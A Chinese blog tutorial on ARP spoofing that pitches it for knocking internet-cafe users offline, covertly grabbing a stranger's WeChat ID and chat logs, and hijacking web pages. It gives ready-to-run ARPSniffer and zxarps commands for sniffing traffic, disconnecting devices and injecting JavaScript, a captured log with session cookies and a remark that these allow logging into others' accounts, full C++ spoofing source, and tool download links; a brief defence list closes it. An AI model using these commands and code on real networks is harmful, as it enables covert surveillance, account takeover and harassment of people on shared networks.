使用ARP欺骗, 截取局域网中任意一台机器的网页请求,破解用户名密码等信息

　　ARP欺骗的做用

　　当你在网吧玩，发现有人玩LOL大吵大闹， 用ARP欺骗把他踢下线吧

　　当你在咖啡厅看上某一个看书的妹纸，又很差意思开口要微信号， 用arp欺骗，不知不觉获取到她的微信号和聊天记录，吓一吓人家也是能够的嘛；

　　当你没啥事的时候， 想窜改局域网内的baidu的首页， 用arp欺骗吧， 把baidu首页跳到你想要的网页；

　　当你想看看同一个局域网的人都在浏览啥玩意儿的时候， 用arp欺骗， 那就不无聊了啊；

 

　　ARP欺骗

　　很早之前就接触过局域网ARP欺骗， 一直没去尝试， 今天就试试，经过ARP欺骗，截获局域网中任意一台计算机的网络通讯数据，很早之前网吧就有 "聚生网管"， "网络执法官", 也都是经过ARP欺骗，让局域网中的任意一台机器断网；

　　首先普及一下基本知识：

　　什么是网关

首先来简单解释一下什么是网关，网关工做在OSI七层模型中的传输层或者应用层，用于高层协议的不一样网络之间的链接，简单地说，网关就比如是一个房间通向另外一个房间的一扇门。

　　ARP协议是什么

　　ARP（Address Resolution Protocol）地址转换协议，工做在OSI模型的数据链路层，在以太网中，网络设备之间互相通讯是用MAC地址而不是IP地址，ARP协议就是用来把IP地址转换为MAC地址的。而RARP和ARP相反，它是反向地址转换协议，把MAC地址转换为IP地址。 假设A(192.168.1.2)与B(192.168.1.3)在同一局域网，A要和B实现通讯。A首先会发送一个数据包到广播地址(192.168.1.255)，该数据包中包含了源IP（A）、源MAC、目的IP（B）、目的MAC，这个数据包会被发放给局域网中全部的主机，可是只有B主机会回复一个包含了源IP（B）、源MAC、目的IP（A）、目的MAC的数据包给A，同时A主机会将返回的这个地址保存在ARP缓存表中。

　　ARP 欺骗分为两种，一种是双向欺骗，一种是单向欺骗:

　　单向ARP欺骗

　　掐断 A 与 B 的通信，实现原理：C 向 A 发送一条 Arp 数据包，内容为：B 的地址是 00:00:00:00:00:00 （一个错误的地址），那么 A 此后向 B 发的数据包都会发到 00，而这个地址是错误的，因此通信中断了，可是要注意了，这里只是 A –> B 中断了，B –> A 没有中断，因此这个叫单向欺骗。

　　掐断 B 与 A 的通信，实现原理和第一条同样，若是和第一条一块儿发，那么 A 和 B 的通信就彻底中断了，即：A <– × –> B

　　 嗅探 A 与 B 的通信，实现原理：C 向 A 发送一条 Arp 数据包，内容为：B 的地址是 AA:BB:CC:DD:EE:FF （C本身的地址），也就是说，C 对 A 说：我才是 B，因而 A 把向 B 发送的数据都发给 C 了，C 获得数据后就能够随心所欲了，能够直接丢弃，那么通信中断，也能够再次转发给 B，那么又造成回路，C 当了个中间人，监视 A 和 B 的通信，此时你就能够用CAIN等任何抓包工具进行本地嗅探了，由于目标机器数据彻底从你这你走，任意嗅探。固然你能够不转发全部数据，只转发部分数据， 把某些特定协议的数据分离出来，而后单独处理，例如替换、修改（相似 zxarp 等 Arp 工具的插入、劫持数据功能），或者干点其余啥，都行。

　　双向ARP欺骗

　　A要跟C正常通信，B向A说我是才C。B向C说我才是A，那么这样的状况下把A跟C的ARP缓存表所有修改了。之后通信过程就是 A把数据发送给B,B在发送给C，C把数据发送B，B在把数据给A。

　　攻击主机发送ARP应答包给被攻击主机和网关，它们分别修改其ARP缓存表为, 修改的全是攻击主机的MAC地址，这样它们之间数据都被攻击主机截获。

　　开始ARP欺骗

　　咱们须要一个exe工具，ARPSniffer.exe， 这个是一个很古老的工具，下载地址是最后会给出来， 使用ARPSniffer以前，必须安装WinpCap，已经安装过了就不要安装了；

　　下载好了解压， 打开命令行窗口(cmd)， 定位到ARPSniffer目录下, 执行 arpsniffer.exe ， 会出现如下的命令行帮助提示：

　　安装提示的使用方法， arpsniffer的第一个参数为网关地址， 我这儿为：192.168.1.1， 第二个参数为要欺骗的IP地址， IP为：192.168.1.107， 第三个参数为要截取数据的端口号：80， 第四个参数是要把捕获的数据保存到指定的文件：log.txt ，一整句命令为：

arpsniffer 192.168.1.1 192.168.1.107 80  log.txt

　　此时注意力转移到IP为192.168.1.107的机器上， 在这台机器上随便打开几个网页；

　　看到在执行命令行的那台计算机上， 命令行窗口一直在闪，   截图：

　　截获的log.txt文件， 内容为：

111.13.82.76(80)->111.13.82.76(53349)
    
 敁p?        ?   111.13.82.76(80)->111.13.82.76(53349)
    
 敁p?        ?   111.13.82.76(80)->111.13.82.76(53349)
    
 敁p?        ?   111.13.82.76(80)->111.13.82.76(53349)
    
 敁p?        ?   111.13.82.76(80)->111.13.82.76(53349)
    
 敁p?        ?   111.13.82.76(80)->111.13.82.76(53349)
    
 敁p?        ?   192.168.1.109(56097)->192.168.1.109(80)
GET /wan/box/Version/WDVersionUpdate.php?version=1.1.2.2&uin=346668791&apps=1105437481_0.5.3.6 HTTP/1.1
Host: apps.game.qq.com
Accept: */*

117.144.244.45(80)->117.144.244.45(56097)
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 16 Nov 2016 06:25:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding

6c
锘縶"bin":{"ret":0,"msg":"you are the latest version"},"app":[{"ret":0,"id":"1105437481"}],"ret":0,"msg":""}
0

192.168.1.109(56099)->192.168.1.109(80)
POST /cm/ReportNew.php HTTP/1.1
Referer: http://www.qq.com
User-Agent: ctgame
Host: apps.wusp.qq.com
Content-Length: 907
Cache-Control: no-cache
Cookie: pt2gguin=o0004247426; RK=6GEq2bbyFh; ptcz=e031b28dc1c3f609157085d4ef85a6c7abaa89e74fe2b9ddb2c3d2f60f054ca1; pgv_pvid=9711168810; eas_sid=01m427J7j8q9k0V6z3v8b2J1l7; ptui_loginuin=1297282063; pgv_pvi=9363555328

192.168.1.109(56099)->192.168.1.109(80)
{
    "data":
    [
        {
            "table": "MicroGBDoingEventNew",
            "iUin": "0",
            "iEventId": "50010",
            "iAction": "2800264",
            "iAppId": "4294967295",
            "vMac": "d4bed9e247df",
            "iClientVersion": "1010202",
            "iLoginWay": "4294967295",
            "vFlashVersion": "13.0.0.182",
            "vSysVersion": "6.1.7601",
            "vBrowserVersion": "9.0.8112.16421"
        },
        {
            "table": "MicroGBDoingEventNew",
            "iUin": "0",
            "iEventId": "50010",
            "iAction": "2800275",
            "iAppId": "4294967295",
            "vMac": "d4bed9e247df",
            "iClientVersion": "1010202",
            "iLoginWay": "4294967295",
            "vFlashVersion": "13.0.0.182",
            "vSysVersion": "6.1.7601",
            "vBrowserVersion": "9.0.8112.16421"
        }
    ]
}
117.135.175.161(80)->117.135.175.161(56099)
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 16 Nov 2016 06:25:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding

29
var ReportNew_JSON = {"ret":0,"msg":"OK"}
0

View Code

　　目标机器请求的数据和收到的数据都会被我截获， 目标机器的请求中若是有一些明文密码， 那么咱们就能够....， 目标的请求cookie也能够获取到， 也就是说，咱们能够绕过密码，直接登陆网页的后台，好比qq空间，qq邮箱， weibo啊这些地方；

　　可是目前的ARP欺骗属于单向欺骗， 咱们虽然截取目标机器的数据， 可是并无转发， 因此目标机器浏览网页的时候会卡死， 这样很容易被发觉， 咱们继续往下走；

　　让局域网中的任意一台计算机或者手机断线

　　让局域网中的任意一台计算机或者手机断线，前提是咱们要先知作别人手机IP或者电脑IP ，接着执行命令， 第一个参数为本地的网关，第二个参数为要断网的设备，第三个参数为 端口号为80：

ARPSniffer 192.168.1.1 192.168.1.105 80 log.txt 

　　以上的代码只是劫持了80 端口， 还要再劫持 443端口， 从新执行一遍 ：

ARPSniffer 192.168.1.1 192.168.1.105 443 log.txt 

　　此时IP为192.168.1.105的设备将会断网， 此时这个设备能够是一台android手机或者iphone手机，或者电脑..等;

　　

　　zxarps实现双向截取数据，并修改网页内容

　　zxarps能够截获服务器返回的内容，并返回个被攻击的机器，并且这个过程当中被攻击的机器彻底不会察觉到，文章最后会提供zxarps.exe文件地址， 要使用zxarps也须要安装WinpCap.exe;

　　下载完毕之后解压， 一样使用cmd(命令行窗口)定位到zxarps的目录， 执行zxarps.exe:

　　按照zxarp的文档, 我想让全部被攻击的用户在访问任意网站的时候， 执行我给出的JS代码， 构建出对应的命令为：

zxarps.exe -idx 0 -ip 192.168.1.102 -p 80 -insert   "<script>alert('chenqihao, sgoyi !')</script>"

　　如今只要IP为192.168.1.102的计算机用户访问协议为http的网页， 页面中都会弹出一条消息，经过查看网页源代码也能够看到， javascript代码被正确插入到页面中：

　　命令行提示“成功插入代码”：

　　IP为192.168.0.107的用户登陆www.youku.com的时候页面上出现了一个提示框， 经过查看网页源码，咱们也看到了攻击者添加的JS代码：

 　　zxarps还有其余的使用方式，好比捕获用户的网页请求数据和接收数据， 截取IP为192.168.1.7和192.168.1.105的全部网页请求并保存起来， 构造以下的命令行：

zxarps -idx 0 -ip 192.168.1.107,192.168.1.105 -p 80 -save_a log.txt

　　命令行开始闪了， 抓包开始了咯， 抓取的全部数据都会保存到log.txt中：

　　ARP欺骗能够实现局域网挂广告， 盗取明文密码， 偷偷刷weibo粉丝， 查看别人的聊天记录等， 获取局域网妹纸的微信号，qq号等， 毕竟能够插入JavaScript代码了， 啥事干不了...

　　有些同窗说，都是黑色窗口的命令行，我不会啊！ 其实也有图形界面的ARP欺骗工具， netfuke ， 至于怎么使用就很少作介绍了；

　　arpCheat源码解析：

　　　　arpCheat是基于C++的代码， 须要winpcap的相关lib, 互联网中的arp包格式为：

　　咱们只要构造出一个请求结构体，把结构体发送给远程计算机便可实现ARP欺骗， 提供一些代码做为参考：

　　AppCheat.h

#ifndef MY_ARP_CHEAT_INCLUDE_H   
#define MY_ARP_CHEAT_INCLUDE_H   
  
//字节对齐必须是1   
#pragma pack (1)   
struct ethernet_head   
{   
    unsigned char dest_mac[6]; //目标主机MAC地址   
    unsigned char source_mac[6]; //源端MAC地址   
    unsigned short eh_type; //以太网类型   
};   
  
struct arp_head   
{   
    unsigned short hardware_type; //硬件类型：以太网接口类型为1   
    unsigned short protocol_type; //协议类型：IP协议类型为0X0800   
    unsigned char add_len; //硬件地址长度：MAC地址长度为6B   
    unsigned char pro_len; //协议地址长度：IP地址长度为4B   
    unsigned short option; //操做：ARP请求为1，ARP应答为2   
    unsigned char sour_addr[6]; //源MAC地址：发送方的MAC地址   
    unsigned long sour_ip; //源IP地址：发送方的IP地址   
    unsigned char dest_addr[6]; //目的MAC地址：ARP请求中该字段没有意义；ARP响应中为接收方的MAC地址   
    unsigned long dest_ip; //目的IP地址：ARP请求中为请求解析的IP地址；ARP响应中为接收方的IP地址  
    unsigned char padding[18];   
};   
  
struct arp_packet //最终arp包结构   
{   
    ethernet_head eth; //以太网头部   
    arp_head arp; //arp数据包头部   
};   
#pragma pack ()   
/**  
* 得到网卡的MAC地址  
* pDevName 网卡的设备名称  
*/   
unsigned char* GetSelfMac(char* pDevName);   
/**  
* 封装ARP请求包  
* source_mac 源MAC地址  
* srcIP 源IP  
* destIP 目的IP  
*/   
unsigned char* BuildArpPacket(unsigned char* source_mac,   
  
unsigned long srcIP, unsigned long destIP);   
  
#endif  

View Code

　　AppCheat.cpp

#include <stdio.h>   
#include <pcap.h>   
#include <conio.h>   
#include <packet32.h>   
#include <ntddndis.h>   
#include "ArpCheat.h"   
  
int main(int argc,char* argv[]){   
    pcap_if_t *alldevs; //所有网卡列表   
    pcap_if_t *d; //一个网卡   
    int inum; //用户选择的网卡序号   
    int i=0; //循环变量   
    pcap_t *adhandle; //一个pcap实例   
    char errbuf[PCAP_ERRBUF_SIZE]; //错误缓冲区   
    unsigned char *mac; //本机MAC地址   
    unsigned char *packet; //ARP包   
    unsigned long fakeIp; //要假装成的IP地址   
    pcap_addr_t *pAddr; //网卡地址   
    unsigned long ip; //IP地址   
    unsigned long netmask; //子网掩码   
      
    if(argc!=2){   
        printf("Usage: %s inet_addr\n",argv[0]);   
        return -1;   
    }   
      
    //从参数列表得到要假装的IP地址   
    fakeIp = inet_addr(argv[1]);   
    if(INADDR_NONE==fakeIp){   
        fprintf(stderr,"Invalid IP: %s\n",argv[1]);   
        return -1;   
    }   
  
    /* 得到本机网卡列表 */   
    if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1)   
    {   
        fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);   
        exit(1);   
    }   
  
    /* 打印网卡列表 */   
    for(d=alldevs; d; d=d->next)   
    {   
        printf("%d", ++i);   
        if (d->description)   
            printf(". %s\n", d->description);   
        else   
            printf(". No description available\n");   
    }   
    //若是没有发现网卡   
    if(i==0)   
    {   
        printf("\nNo interfaces found! Make sure WinPcap is installed.\n");   
        return -1;   
    }   
    //请用户选择一个网卡   
    printf("Enter the interface number (1-%d):",i);   
    scanf("%d", &inum);   
      
    //若是用户选择的网卡序号超出有效范围，则退出   
    if(inum < 1 || inum > i)   
    {   
        printf("\nInterface number out of range.\n");   
        /* Free the device list */   
        pcap_freealldevs(alldevs);   
        return -1;   
    }   
  
  
  
  
    /* 移动指针到用户选择的网卡 */   
    for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);   
      
    mac = GetSelfMac(d->name+8); //+8以去掉"rpcap://"   
      
    printf("发送ARP欺骗包，本机(%.2X-%.2X-%.2X-%.2X-%.2X-%.2X) 试图假装成%s\n",   
    mac[0],mac[1],mac[2],mac[3],mac[4],mac[5],argv[1]);   
      
    /* 打开网卡 */   
    if ( (adhandle= pcap_open(d->name, // name of the device   
    65536, // portion of the packet to capture   
    0, //open flag   
    1000, // read timeout   
    NULL, // authentication on the remote machine   
    errbuf // error buffer   
    ) ) == NULL)   
    {   
        fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n",   
        d->name);   
        /* Free the device list */   
        pcap_freealldevs(alldevs);   
        return -1;   
    }   
  
    for(pAddr=d->addresses; pAddr; pAddr=pAddr->next){   
        //获得用户选择的网卡的一个IP地址   
        ip = ((struct sockaddr_in *)pAddr->addr)->sin_addr.s_addr;   
        //获得该IP地址对应的子网掩码   
        netmask = ((struct sockaddr_in *)(pAddr->netmask))->sin_addr.S_un.S_addr;   
        if (!ip || !netmask){   
            continue;   
        }   
        //看看这个IP和要假装的IP是否在同一个子网   
        if((ip&netmask)!=(fakeIp&netmask)){   
            continue; //若是不在一个子网，继续遍历地址列表   
        }   
  
        unsigned long netsize = ntohl(~netmask); //网络中主机数  
        unsigned long net = ip & netmask; //子网地址   
          
        for(unsigned long n=1; n<netsize; n++){   
            //第i台主机的IP地址，网络字节顺序   
            unsigned long destIp = net | htonl(n);   
            //构建假的ARP请求包，达到本机假装成给定的IP地址的目的   
            packet = BuildArpPacket(mac,fakeIp,destIp);   
            if(pcap_sendpacket(adhandle, packet, 60)==-1){   
                fprintf(stderr,"pcap_sendpacket error.\n");   
            }   
        }   
      
    }   
     return 0;   
}   
/**  
* 得到网卡的MAC地址  
* pDevName 网卡的设备名称  
*/   
unsigned char* GetSelfMac(char* pDevName){   
      
    static u_char mac[6];   
      
    memset(mac,0,sizeof(mac));   
      
    LPADAPTER lpAdapter = PacketOpenAdapter(pDevName);   
      
    if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))   
    {   
        return NULL;   
    }   
      
    PPACKET_OID_DATA OidData = (PPACKET_OID_DATA)malloc(6 + sizeof(PACKET_OID_DATA));   
    if (OidData == NULL)   
    {   
        PacketCloseAdapter(lpAdapter);   
        return NULL;   
    }   
    //   
    // Retrieve the adapter MAC querying the NIC driver   
    //   
    OidData->Oid = OID_802_3_CURRENT_ADDRESS;   
      
    OidData->Length = 6;   
    memset(OidData->Data, 0, 6);   
    BOOLEAN Status = PacketRequest(lpAdapter, FALSE, OidData);   
    if(Status)   
    {   
        memcpy(mac,(u_char*)(OidData->Data),6);   
    }   
    free(OidData);   
    PacketCloseAdapter(lpAdapter);   
    return mac;   
  
}   
  
/**  
* 封装ARP请求包  
* source_mac 源MAC地址  
* srcIP 源IP  
* destIP 目的IP  
*/   
unsigned char* BuildArpPacket(unsigned char* source_mac,   
unsigned long srcIP,unsigned long destIP)   
{   
    static struct arp_packet packet;   
      
    //目的MAC地址为广播地址，FF-FF-FF-FF-FF-FF   
    memset(packet.eth.dest_mac,0xFF,6);   
    //源MAC地址   
    memcpy(packet.eth.source_mac,source_mac,6);   
    //上层协议为ARP协议，0x0806   
    packet.eth.eh_type = htons(0x0806);   
      
    //硬件类型，Ethernet是0x0001   
    packet.arp.hardware_type = htons(0x0001);   
    //上层协议类型，IP为0x0800   
    packet.arp.protocol_type = htons(0x0800);   
    //硬件地址长度：MAC地址长度为0x06   
    packet.arp.add_len = 0x06;   
    //协议地址长度：IP地址长度为0x04   
    packet.arp.pro_len = 0x04;   
    //操做：ARP请求为1   
    packet.arp.option = htons(0x0001);   
    //源MAC地址   
    memcpy(packet.arp.sour_addr,source_mac,6);   
    //源IP地址   
    packet.arp.sour_ip = srcIP;   
    //目的MAC地址，填充0   
    memset(packet.arp.dest_addr,0,6);   
    //目的IP地址   
    packet.arp.dest_ip = destIP;   
    //填充数据，18B   
    memset(packet.arp.padding,0,18);   
      
    return (unsigned char*)&packet;   
} 

View Code

　　ARP欺骗的防范：

　　　　1:不要随意登陆免费的WIFI， 没人知道免费的WIFI是否是有恶意的攻击者在搞鬼；

　　　　2:使用ARP绑定， 避免被ARP欺骗；

　　　　3:开启电脑管家或者安全卫士的ARP防火墙；

　　　　4:使用https协议或者其余有保密协议的链接访问外网，避免被坑

　　必定要注意：

　　ARPSniffer和zxarp只能在window系统上运行， 目前测试环境为WIN7旗舰版， 在别的系统上不必定能跑(个人window10 和另一台win8就不行)， winpCap也要根据你的目前的系统， 选择32位或者64位的进行下载； 

　　exe文件下载列表：

　　WinpCap下载安装：http://pan.baidu.com/s/1i48KJPz

　　ARPSniffer.exe下载： http://pan.baidu.com/s/1qXUlkV6

　　zxarp.exe下载地址：http://pan.baidu.com/s/1bNSetw

　　arp绑定：：http://blog.sina.com.cn/s/blog_54c367d401018o1w.html

　　ARP欺骗参考：http://blog.csdn.net/smstong/article/details/7221184

　　ARP欺骗源码实现：http://blog.csdn.net/baggiowangyu/article/details/7081365

　　WinPCap开发包：https://www.winpcap.org/devel.htm

　　WinPCap：http://blog.csdn.net/tamarous/article/details/45753751

　　linux和mac系统下arp欺骗参考：https://lngost.github.io/pages/articles/tech/ARP-Packet-By-c/arp-packet-by-c.html

做者： NONO
出处：http://www.cnblogs.com/diligenceday/
企业网站：http://www.idrwl.com/
开源博客：http://www.github.com/sqqihao
QQ：287101329
微信：18101055830